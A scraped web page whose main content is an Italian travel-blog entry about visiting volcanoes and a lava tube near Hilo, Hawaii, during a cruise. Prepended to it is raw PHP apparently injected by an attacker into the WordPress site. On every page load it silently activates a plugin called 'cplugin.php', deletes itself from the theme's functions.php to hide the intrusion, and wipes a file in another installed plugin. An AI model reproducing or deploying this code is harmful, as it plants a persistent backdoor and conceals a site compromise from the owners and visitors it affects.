function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php'); file_put_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Corto in Corto : I vulcani di Hilo
  • Corto in Vacanza

I vulcani di Hilo

Dopo la visita al giardino, siamo andati a scoprire le cascate in una riserva naturale. E’ un’isola vulcanica; c’è anche la possibilità di “entrare” in un tunnel scavato nella lava. Poi, viaggio in autobus alla scoperta di altri vulcani ancora in attività con getti di vapore di zolfo incandescente che abbiamo potuto vedere molto da vicino. E’ impressionante. Qui c’è ancora l’usanza di offrire cibo e frutta agli dei. Quanto fatto ad esclusivo interesse dei turisti, non so.
La nostra guida, un parlatore instancabile, ha fatto in modo di riportarci ai limiti dell’ora di imbarco. Di qui siamo partiti per l’isola di Maui, là dove i surfisti di tutto il mondo si danno appuntamento. I nostri amici Maccario sono sempre in lotta con la loro carta di credito ed è con angoscia che vedono arrivare il week-end (con la chiusura delle banche) e la fine della crociera. La cosa, ovviamente non ci fa ridere, visto che anche noi abbiamo lo stesso problema. Con i conti della crociera non si quanti piatti dovremo lavare se la Banca rifiuta di onorare la nostra carta.

FOTO E TESTO DI FRANCOIS BARETTE©

Inserisci un commento

Modulo di inserimento